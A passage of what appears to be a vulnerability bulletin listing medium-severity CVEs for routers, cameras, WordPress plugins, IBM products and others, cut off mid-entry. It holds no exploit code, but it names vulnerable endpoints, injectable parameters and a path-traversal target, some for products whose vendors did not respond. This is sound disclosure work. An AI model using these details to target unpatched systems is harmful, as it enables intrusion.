A vulnerability, which was classified as critical, has been found in D-Link DIR-816 A2 1.10CNB05_R1B011D88210. This issue affects some unknown processing of the file /goform/form2AddVrtsrv.cgi of the component Virtual Service Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13103 |
| D-Link--DIR-816 A2 |
A vulnerability, which was classified as critical, was found in D-Link DIR-816 A2 1.10CNB05_R1B011D88210. Affected is an unknown function of the file /goform/form2AdvanceSetup.cgi of the component WiFi Settings Handler. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13104 |
| D-Link--DIR-816 A2 |
A vulnerability has been found in D-Link DIR-816 A2 1.10CNB05_R1B011D88210 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/form2Dhcpd.cgi of the component DHCPD Setting Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13105 |
| D-Link--DIR-816 A2 |
A vulnerability was found in D-Link DIR-816 A2 1.10CNB05_R1B011D88210 and classified as critical. Affected by this issue is some unknown functionality of the file /goform/form2IPQoSTcAdd of the component IP QoS Handler. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13106 |
| D-Link--DIR-816 A2 |
A vulnerability was found in D-Link DIR-816 A2 1.10CNB05_R1B011D88210. It has been classified as critical. This affects an unknown part of the file /goform/form2LocalAclEditcfg.cgi of the component ACL Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13107 |
| D-Link--DIR-816 A2 |
A vulnerability was found in D-Link DIR-816 A2 1.10CNB05_R1B011D88210. It has been declared as critical. This vulnerability affects unknown code of the file /goform/form2NetSniper.cgi. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 5.3 | CVE-2024-13108 |
| Dahua--IPC-HFW1200S |
A vulnerability classified as problematic has been found in Dahua IPC-HFW1200S, IPC-HFW2300R-Z, IPC-HFW5220E-Z and IPC-HDW1200S up to 20241222. This affects an unknown part of the file /web_caps/webCapsConfig of the component Web Interface. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-05 | 5.3 | CVE-2024-13131 |
| Dahua--IPC-HFW1200S |
A vulnerability was found in Dahua IPC-HFW1200S, IPC-HFW2300R-Z, IPC-HFW5220E-Z and IPC-HDW1200S up to 20241222. It has been rated as problematic. Affected by this issue is some unknown functionality of the file ../mtd/Config/Sha1Account1 of the component Web Interface. The manipulation leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-05 | 4.3 | CVE-2024-13130 |
| Daniel Sderstrm / Sidney van de Stouwe--Subscribe to Category |
Missing Authorization vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Subscribe to Category: from n/a through 2.7.4. | 2025-01-02 | 4.3 | CVE-2022-43476 |
| David de Boer--Paytium |
Missing Authorization vulnerability in David de Boer Paytium.This issue affects Paytium: from n/a through 4.4.10. | 2024-12-31 | 4.3 | CVE-2024-51667 |
| Debuggers Studio--SaasPricing |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Debuggers Studio SaasPricing allows DOM-Based XSS.This issue affects SaasPricing: from n/a through 1.1.4. | 2024-12-31 | 6.5 | CVE-2024-56231 |
| DesertThemes--NewsMash |
Cross-Site Request Forgery (CSRF) vulnerability in DesertThemes NewsMash allows Cross Site Request Forgery.This issue affects NewsMash: from n/a through 1.0.34. | 2025-01-02 | 4.3 | CVE-2024-37441 |
| dglingren--Media Library Assistant |
The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'smc_settings_tab', 'unattachfixit-action', and 'woofixit-action' parameters in all versions up to, and including, 3.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-04 | 6.1 | CVE-2024-11974 |
| Dragfy--Dragfy Addons for Elementor |
Missing Authorization vulnerability in Dragfy Dragfy Addons for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dragfy Addons for Elementor: from n/a through 1.0.2. | 2025-01-02 | 5.4 | CVE-2023-47661 |
| Ecreate Infotech--Auto Tag Creator |
Missing Authorization vulnerability in Ecreate Infotech Auto Tag Creator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Auto Tag Creator: from n/a through 1.0.2. | 2025-01-02 | 4.3 | CVE-2023-47523 |
| Elicus--WPMozo Addons Lite for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elicus WPMozo Addons Lite for Elementor allows Stored XSS.This issue affects WPMozo Addons Lite for Elementor: from n/a through 1.2.0. | 2024-12-31 | 6.5 | CVE-2024-56221 |
| Epsiloncool--WP Fast Total Search |
Cross-Site Request Forgery (CSRF) vulnerability in Epsiloncool WP Fast Total Search.This issue affects WP Fast Total Search: from n/a through 1.69.234. | 2025-01-02 | 4.3 | CVE-2024-38778 |
| Event Espresso--Event Espresso 4 Decaf |
Cross-Site Request Forgery (CSRF) vulnerability in Event Espresso Event Espresso 4 Decaf allows Cross Site Request Forgery.This issue affects Event Espresso 4 Decaf: from n/a through 5.0.28.decaf. | 2025-01-02 | 4.3 | CVE-2024-56251 |
| ExtendThemes--Highlight |
Cross-Site Request Forgery (CSRF) vulnerability in ExtendThemes Highlight allows Cross Site Request Forgery.This issue affects Highlight: from n/a through 1.0.29. | 2025-01-02 | 4.3 | CVE-2024-37458 |
| Faboba--Falang multilanguage |
Cross-Site Request Forgery (CSRF) vulnerability in Faboba Falang multilanguage allows Cross Site Request Forgery.This issue affects Falang multilanguage: from n/a through 1.3.51. | 2025-01-02 | 4.3 | CVE-2024-37240 |
| FameThemes--OnePress |
Cross-Site Request Forgery (CSRF) vulnerability in FameThemes OnePress allows Cross Site Request Forgery.This issue affects OnePress: from n/a through 2.3.6. | 2025-01-02 | 4.3 | CVE-2024-37448 |
| Farhan Noor--ApplyOnline Application Form Builder and Manager |
Missing Authorization vulnerability in Farhan Noor ApplyOnline - Application Form Builder and Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ApplyOnline - Application Form Builder and Manager: from n/a through 2.5.3. | 2025-01-02 | 4.3 | CVE-2023-46080 |
| Fatcat Apps--Landing Page Cat |
Missing Authorization vulnerability in Fatcat Apps Landing Page Cat.This issue affects Landing Page Cat: from n/a through 1.7.4. | 2024-12-31 | 5.4 | CVE-2024-49686 |
| FeedbackWP--kk Star Ratings |
Missing Authorization vulnerability in FeedbackWP kk Star Ratings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects kk Star Ratings: from n/a through 5.4.5. | 2025-01-02 | 5.3 | CVE-2023-46639 |
| FeedFocal--FeedFocal |
Missing Authorization vulnerability in FeedFocal FeedFocal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FeedFocal: from n/a through 1.2.2. | 2025-01-02 | 6.5 | CVE-2023-46609 |
| Flothemes--Flo Forms |
Missing Authorization vulnerability in Flothemes Flo Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flo Forms: from n/a through 1.0.41. | 2025-01-02 | 4.3 | CVE-2023-47692 |
| Freelancelot--Oceanic |
Cross-Site Request Forgery (CSRF) vulnerability in Freelancelot Oceanic allows Cross Site Request Forgery.This issue affects Oceanic: from n/a through 1.0.48. | 2025-01-02 | 4.3 | CVE-2024-38765 |
| Freshlight Lab--WP Mobile Menu |
Cross-Site Request Forgery (CSRF) vulnerability in Freshlight Lab WP Mobile Menu allows Cross Site Request Forgery.This issue affects WP Mobile Menu: from n/a through 2.8.4.3. | 2025-01-02 | 4.3 | CVE-2024-37274 |
| FS-code--FS Poster |
Cross-Site Request Forgery (CSRF) vulnerability in FS-code FS Poster allows Cross Site Request Forgery.This issue affects FS Poster: from n/a through 6.5.8. | 2025-01-02 | 4.3 | CVE-2024-37237 |
| Galleryape--Gallery Images Ape |
Missing Authorization vulnerability in Galleryape Gallery Images Ape allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gallery Images Ape: from n/a through 2.2.8. | 2025-01-02 | 4.3 | CVE-2022-41995 |
| Gavin Rehkemper--Inline Footnotes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gavin Rehkemper Inline Footnotes allows Stored XSS.This issue affects Inline Footnotes: from n/a through 2.3.0. | 2025-01-02 | 6.5 | CVE-2024-56019 |
| Gfazioli--WP Cleanfix |
Missing Authorization vulnerability in Gfazioli WP Cleanfix allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cleanfix: from n/a through 5.6.2. | 2024-12-31 | 5.3 | CVE-2023-48775 |
| GiveWP--GiveWP |
Missing Authorization vulnerability in GiveWP GiveWP allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GiveWP: from n/a through 2.33.1. | 2025-01-02 | 5.3 | CVE-2023-47183 |
| Google--Android |
In wbrc_bt_dev_write of wb_regon_coordinator.c, there is a possible out of bounds write due to a buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | 6.7 | CVE-2024-53836 |
| Google--Android |
In GetCellInfoList() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User Interaction is not needed for exploitation. | 2025-01-03 | 5.5 | CVE-2024-53839 |
| Greg Winiarski--WPAdverts Classifieds Plugin |
Cross-Site Request Forgery (CSRF) vulnerability in Greg Winiarski WPAdverts - Classifieds Plugin allows Cross Site Request Forgery.This issue affects WPAdverts - Classifieds Plugin: from n/a through 2.1.2. | 2025-01-02 | 4.3 | CVE-2024-37238 |
| Groundhogg Inc.--Groundhogg |
Cross-Site Request Forgery (CSRF) vulnerability in Groundhogg Inc. Groundhogg allows Cross Site Request Forgery.This issue affects Groundhogg: from n/a through 3.4.2.3. | 2025-01-02 | 4.3 | CVE-2024-37235 |
| GS Plugins--GS Coaches |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GS Plugins GS Coaches allows Stored XSS.This issue affects GS Coaches: from n/a through 1.1.0. | 2025-01-02 | 6.5 | CVE-2024-56262 |
| GS Plugins--GS Shots for Dribbble |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GS Plugins GS Shots for Dribbble allows DOM-Based XSS.This issue affects GS Shots for Dribbble: from n/a through 1.2.0. | 2025-01-02 | 6.5 | CVE-2024-56263 |
| GS Plugins--Project Showcase |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GS Plugins Project Showcase allows Stored XSS.This issue affects Project Showcase: from n/a through 1.1.1. | 2025-01-02 | 6.5 | CVE-2024-56261 |
| gVectors Team--wpDiscuz |
Missing Authorization vulnerability in gVectors Team wpDiscuz allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpDiscuz: from n/a through 7.6.10. | 2025-01-02 | 5.3 | CVE-2023-46309 |
| gVectors Team--wpDiscuz |
Missing Authorization vulnerability in gVectors Team wpDiscuz allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpDiscuz: from n/a through 7.6.3. | 2025-01-02 | 4.3 | CVE-2023-45760 |
| Horea Radu--Mesmerize |
Cross-Site Request Forgery (CSRF) vulnerability in Horea Radu Mesmerize allows Cross Site Request Forgery.This issue affects Mesmerize: from n/a through 1.6.120. | 2025-01-02 | 4.3 | CVE-2024-37431 |
| IBM--Engineering Lifecycle Optimization Publishing |
IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. | 2025-01-04 | 6.5 | CVE-2024-41765 |
| IBM--Engineering Lifecycle Optimization Publishing |
IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 could allow a remote attacker to cause an unhandled SSL exception which could leave the connection in an unexpected or insecure state. | 2025-01-04 | 6.5 | CVE-2024-41768 |
| IBM--Engineering Lifecycle Optimization Publishing |
IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. | 2025-01-04 | 5.9 | CVE-2024-41763 |
| IBM--i |
IBM PowerHA SystemMirror for i 7.4 and 7.5 contains improper restrictions when rendering content via iFrames. This vulnerability could allow an attacker to gain improper access and perform unauthorized actions on the system. | 2025-01-03 | 5.4 | CVE-2024-55896 |
| IBM--i |
IBM PowerHA SystemMirror for i 7.4 and 7.5 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. | 2025-01-03 | 4.3 | CVE-2024-55897 |
| IBM--Jazz Foundation |
IBM Jazz Foundation 7.0.2, 7.0.3, and 7.1.0 could could allow a physical user to obtain sensitive information due to not masking passwords during entry. | 2025-01-03 | 4.2 | CVE-2024-41780 |
| IBM--Jazz Foundation |
IBM Jazz Foundation 7.0.2, 7.0.3, and 7.1.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2025-01-03 | 4.3 | CVE-2024-5591 |
| ibnuyahya--Category Post Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ibnuyahya Category Post Shortcode allows Stored XSS.This issue affects Category Post Shortcode: from n/a through 2.4. | 2025-01-01 | 6.5 | CVE-2024-56021 |
| IDX--IMPress Listings |
Missing Authorization vulnerability in IDX IMPress Listings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects IMPress Listings: from n/a through 2.6.2. | 2025-01-02 | 6.5 | CVE-2023-45633 |
| imw3--My Wp Brand Hide menu & Hide Plugin |
Missing Authorization vulnerability in imw3 My Wp Brand - Hide menu & Hide Plugin.This issue affects My Wp Brand - Hide menu & Hide Plugin: from n/a through 1.1.2. | 2024-12-31 | 5.3 | CVE-2024-49694 |
| IOBit--Protected Folder |
A vulnerability has been found in IOBit Protected Folder up to 1.3.0 and classified as problematic. This vulnerability affects the function 0x22200c in the library pffilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-05 | 5.5 | CVE-2025-0221 |
| IObit--Protected Folder |
A vulnerability was found in IObit Protected Folder up to 13.6.0.5 and classified as problematic. This issue affects the function 0x8001E000/0x8001E004 in the library IUProcessFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-05 | 5.5 | CVE-2025-0222 |
| IObit--Protected Folder |
A vulnerability was found in IObit Protected Folder up to 13.6.0.5. It has been classified as problematic. Affected is the function 0x8001E000/0x8001E00C/0x8001E004/0x8001E010 in the library IURegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-05 | 5.5 | CVE-2025-0223 |
| Jakob Bouchard--Hestia Nginx Cache |
Missing Authorization vulnerability in Jakob Bouchard Hestia Nginx Cache allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hestia Nginx Cache: from n/a through 2.4.0. | 2025-01-02 | 4.3 | CVE-2024-56236 |
| JoomUnited--WP Table Manager |
Missing Authorization vulnerability in JoomUnited WP Table Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Table Manager: from n/a through 3.5.2. | 2025-01-02 | 5.3 | CVE-2022-47601 |
| Jose Mortellaro--Freesoul Deactivate Plugins Plugin manager and cleanup |
Missing Authorization vulnerability in Jose Mortellaro Freesoul Deactivate Plugins - Plugin manager and cleanup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Freesoul Deactivate Plugins - Plugin manager and cleanup: from n/a through 2.1.3. | 2025-01-02 | 4.3 | CVE-2023-46188 |
| JS Morisset--WPSSO Core |
Missing Authorization vulnerability in JS Morisset WPSSO Core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPSSO Core: from n/a through 18.18.1. | 2025-01-02 | 4.3 | CVE-2024-56243 |
| JustCoded / Alex Prokopenko--Just Custom Fields |
Missing Authorization vulnerability in JustCoded / Alex Prokopenko Just Custom Fields allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Just Custom Fields: from n/a through 3.3.2. | 2025-01-02 | 4.3 | CVE-2023-46203 |
| justin_k--WP Social AutoConnect |
The WP Social AutoConnect plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-04 | 6.1 | CVE-2024-12279 |
| KaizenCoders--Short URL |
Missing Authorization vulnerability in KaizenCoders Short URL allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Short URL: from n/a through 1.6.8. | 2025-01-02 | 5.4 | CVE-2023-47225 |
| Kali Forms--Contact Form builder with drag & drop - Kali Forms |
Missing Authorization vulnerability in Kali Forms Contact Form builder with drag & drop - Kali Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form builder with drag & drop - Kali Forms: from n/a through 2.3.28. | 2025-01-02 | 6.5 | CVE-2023-45275 |
| Kali Forms--Contact Form builder with drag & drop - Kali Forms |
Missing Authorization vulnerability in Kali Forms Contact Form builder with drag & drop - Kali Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form builder with drag & drop - Kali Forms: from n/a through 2.3.27. | 2025-01-02 | 5.3 | CVE-2023-46083 |
| khoj-ai--khoj |
Khoj is a self-hostable artificial intelligence app. Prior to version 1.29.10, an Insecure Direct Object Reference (IDOR) vulnerability in the update_subscription endpoint allows any authenticated user to manipulate other users' Stripe subscriptions by simply modifying the email parameter in the request. The vulnerability exists in the subscription endpoint at `/api/subscription`. The endpoint uses an email parameter as a direct reference to user subscriptions without verifying object ownership. While authentication is required, there is no authorization check to verify if the authenticated user owns the referenced subscription. The issue was fixed in version 1.29.10. Support for arbitrarily presenting an email for update has been deprecated. | 2024-12-30 | 4.3 | CVE-2024-52294 |
| Kishor Khambu--WP Custom Widget area |
Missing Authorization vulnerability in Kishor Khambu WP Custom Widget area allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Custom Widget area: from n/a through 1.2.5. | 2025-01-02 | 5.4 | CVE-2023-45045 |
| Labib Ahmed--Animated Rotating Words |
Missing Authorization vulnerability in Labib Ahmed Animated Rotating Words allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Animated Rotating Words: from n/a through 5.4. | 2025-01-02 | 5.4 | CVE-2023-47187 |
| Labib Ahmed--Animated Rotating Words |
Cross-Site Request Forgery (CSRF) vulnerability in Labib Ahmed Animated Rotating Words allows Cross Site Request Forgery.This issue affects Animated Rotating Words: from n/a through 5.6. | 2025-01-02 | 4.3 | CVE-2024-38753 |
| Leaky Paywall--Leaky Paywall |
Cross-Site Request Forgery (CSRF) vulnerability in Leaky Paywall Leaky Paywall allows Cross Site Request Forgery.This issue affects Leaky Paywall: from n/a through 4.21.2. | 2025-01-02 | 4.3 | CVE-2024-37540 |
| Leap13--Premium Addons for Elementor |
Missing Authorization vulnerability in Leap13 Premium Addons for Elementor allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Premium Addons for Elementor: from n/a through 4.10.56. | 2024-12-31 | 5.4 | CVE-2024-56225 |
| Leap13--Premium Blocks Gutenberg Blocks for WordPress |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leap13 Premium Blocks - Gutenberg Blocks for WordPress allows Stored XSS.This issue affects Premium Blocks - Gutenberg Blocks for WordPress: from n/a through 2.1.42. | 2025-01-02 | 6.5 | CVE-2024-56245 |
| LearningTimes--BadgeOS |
Missing Authorization vulnerability in LearningTimes BadgeOS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BadgeOS: from n/a through 3.7.1.6. | 2025-01-02 | 4.3 | CVE-2023-47647 |
| Ledenbeheer--Ledenbeheer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ledenbeheer allows Stored XSS.This issue affects Ledenbeheer: from n/a through 2.1.0. | 2024-12-31 | 6.5 | CVE-2024-56224 |
| Liquid Web / StellarWP--GiveWP |
Missing Authorization vulnerability in Liquid Web / StellarWP GiveWP.This issue affects GiveWP: from n/a through 2.25.1. | 2025-01-02 | 5.4 | CVE-2023-23672 |
| LuckyWP--LuckyWP Scripts Control |
Missing Authorization vulnerability in LuckyWP LuckyWP Scripts Control allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LuckyWP Scripts Control: from n/a through 1.2.1. | 2025-01-02 | 4.3 | CVE-2023-47778 |
| Magazine3--Google Adsense & Banner Ads by AdsforWP |
Cross-Site Request Forgery (CSRF) vulnerability in Magazine3 Google Adsense & Banner Ads by AdsforWP allows Cross Site Request Forgery.This issue affects Google Adsense & Banner Ads by AdsforWP: from n/a through 1.9.28. | 2025-01-02 | 4.3 | CVE-2024-38751 |
| Marco Milesi--Telegram Bot & Channel |
Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi Telegram Bot & Channel allows Cross Site Request Forgery.This issue affects Telegram Bot & Channel: from n/a through 3.8.2. | 2025-01-02 | 5.4 | CVE-2024-38789 |
| Mario Di Pasquale--SvegliaT Buttons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mario Di Pasquale SvegliaT Buttons allows Stored XSS.This issue affects SvegliaT Buttons: from n/a through 1.3.0. | 2025-01-01 | 6.5 | CVE-2024-56020 |
| MarketingFire--Widget Options |
Missing Authorization vulnerability in MarketingFire Widget Options allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Widget Options: from n/a through 4.0.6.1. | 2024-12-31 | 4.3 | CVE-2024-56219 |
| Marsian--i-amaze |
Cross-Site Request Forgery (CSRF) vulnerability in Marsian i-amaze allows Cross Site Request Forgery.This issue affects i-amaze: from n/a through 1.3.7. | 2025-01-02 | 4.3 | CVE-2024-38731 |
| Marsian--i-transform |
Cross-Site Request Forgery (CSRF) vulnerability in Marsian allows Cross Site Request Forgery.This issue affects i-transform: from n/a through 3.0.9. | 2025-01-02 | 4.3 | CVE-2024-38764 |
| Martin Gibson--WP Custom Admin Interface |
Missing Authorization vulnerability in Martin Gibson WP Custom Admin Interface allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Custom Admin Interface: from n/a through 7.32. | 2025-01-02 | 4.3 | CVE-2023-44988 |
| Mashov--Mashov |
Mashov - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor | 2024-12-30 | 5.3 | CVE-2024-47923 |
| Matomo--Matomo Analytics |
Cross-Site Request Forgery (CSRF) vulnerability in Matomo Matomo Analytics allows Cross Site Request Forgery.This issue affects Matomo Analytics: from n/a through 5.1.1. | 2025-01-02 | 4.3 | CVE-2024-38766 |
| MBE Worldwide S.p.A.--MBE eShip |
Cross-Site Request Forgery (CSRF) vulnerability in MBE Worldwide S.p.A. MBE eShip allows Cross Site Request Forgery.This issue affects MBE eShip: from n/a through 2.1.2. | 2025-01-02 | 5.4 | CVE-2024-38729 |
| Metorik--Metorik Reports & Email Automation for WooCommerce |
Cross-Site Request Forgery (CSRF) vulnerability in Metorik Metorik - Reports & Email Automation for WooCommerce allows Cross Site Request Forgery.This issue affects Metorik - Reports & Email Automation for WooCommerce: from n/a through 1.7.1. | 2025-01-02 | 4.3 | CVE-2024-38691 |
| moveaddons--Move Addons for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in moveaddons Move Addons for Elementor allows Stored XSS.This issue affects Move Addons for Elementor: from n/a through 1.3.6. | 2025-01-02 | 6.5 | CVE-2024-56254 |
| MyThemeShop--Schema Lite |
Cross-Site Request Forgery (CSRF) vulnerability in MyThemeShop Schema Lite allows Cross Site Request Forgery.This issue affects Schema Lite: from n/a through 1.2.2. | 2025-01-02 | 4.3 | CVE-2024-37452 |
| n/a--n/a |
FFmpeg n6.1.1 has a vulnerability in the DXA demuxer of the libavformat library allowing for an integer overflow, potentially resulting in a denial-of-service (DoS) condition or other undefined behavior. | 2025-01-03 | 6.2 | CVE-2024-36613 |
| n/a--n/a |
The Net::EasyTCP package before 0.15 for Perl always uses Perl's builtin rand(), which is not a strong random number generator, for cryptographic keys. | 2025-01-02 | 5.4 | CVE-2002-20002 |
| n/a--n/a |
The Net::EasyTCP package 0.15 through 0.26 for Perl uses Perl's builtin rand() if no strong randomization module is present. | 2025-01-02 | 5.4 | CVE-2024-56830 |
| n/a--n/a |
Cross Site Scripting vulnerability in Audiocodes MP-202b v.4.4.3 allows a remote attacker to escalate privileges via the login page of the web interface. | 2025-01-02 | 4.7 | CVE-2024-48197 |
| n/a--n/a |
Landray EIS 2001 through 2006 allows Message/fi_message_receiver.aspx?replyid= SQL injection. | 2025-01-02 | 4.3 | CVE-2025-22214 |
| nik00726--Photo Gallery Slideshow & Masonry Tiled Gallery |
The Photo Gallery Slideshow & Masonry Tiled Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.15 via the rjg_get_youtube_info_justified_gallery_callback function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to retrieve limited information from internal services. | 2025-01-03 | 4.3 | CVE-2024-12237 |
| Nitesh Singh--Ultimate Auction |
Cross-Site Request Forgery (CSRF) vulnerability in Nitesh Singh Ultimate Auction allows Cross Site Request Forgery.This issue affects Ultimate Auction : from n/a through 4.2.5. | 2025-01-02 | 4.3 | CVE-2024-37543 |
| nofearinc--DX Delete Attached Media |
Missing Authorization vulnerability in nofearinc DX Delete Attached Media allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DX Delete Attached Media: from n/a through 2.0.5.1. | 2025-01-02 | 5.3 | CVE-2023-46073 |
| NSquared--Draw Attention |
Missing Authorization vulnerability in NSquared Draw Attention allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Draw Attention: from n/a through 2.0.15. | 2025-01-02 | 5.4 | CVE-2023-46616 |
| pglombardo--PasswordPusher |
Password Pusher is an open source application to communicate sensitive information over the web. A vulnerability has been reported in versions 1.50.3 and prior where an attacker can copy the session cookie before a user logs out, potentially allowing session hijacking. Although the session token is replaced and invalidated upon logout, if an attacker manages to capture the session cookie before this process, they can use the token to gain unauthorized access to the user's session until the token expires or is manually cleared. This vulnerability hinges on the attacker's ability to access the session cookie during an active session, either through a man-in-the-middle attack, by exploiting another vulnerability like XSS, or via direct access to the victim's device. Although there is no direct resolution to this vulnerability, it is recommended to always use the latest version of Password Pusher to best mitigate risk. If self-hosting, ensure Password Pusher is hosted exclusively over SSL connections to encrypt traffic and prevent session cookies from being intercepted in transit. Additionally, implement best practices in local security to safeguard user systems, browsers, and data against unauthorized access. | 2024-12-30 | 5.7 | CVE-2024-56733 |
| PHPGurukul--Land Record System |
A vulnerability has been found in PHPGurukul Land Record System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 6.3 | CVE-2024-13078 |
| PHPGurukul--Land Record System |
A vulnerability was found in PHPGurukul Land Record System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/property-details.php. The manipulation of the argument editid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 6.3 | CVE-2024-13079 |
| PHPGurukul--Land Record System |
A vulnerability classified as critical was found in PHPGurukul Land Record System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/search-property.php. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 6.3 | CVE-2024-13084 |
| Poll Maker Team--Poll Maker |
Missing Authorization vulnerability in Poll Maker Team Poll Maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Poll Maker: from n/a through 4.7.1. | 2025-01-02 | 5.3 | CVE-2023-45766 |
| Porthas Inc.--Contact Form, Survey & Form Builder MightyForms |
Missing Authorization vulnerability in Porthas Inc. Contact Form, Survey & Form Builder - MightyForms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form, Survey & Form Builder - MightyForms: from n/a through 1.3.9. | 2024-12-31 | 6.4 | CVE-2024-56002 |
| Porto Theme--Porto Theme - Functionality |
Missing Authorization vulnerability in Porto Theme Porto Theme - Functionality allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Porto Theme - Functionality: from n/a before 2.12.1. | 2025-01-02 | 5.3 | CVE-2023-48739 |
| POSIMYTH--Nexter Blocks |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH Nexter Blocks allows DOM-Based XSS.This issue affects Nexter Blocks: from n/a through 4.0.4. | 2025-01-02 | 6.5 | CVE-2024-56246 |
| PressTigers--Simple Job Board |
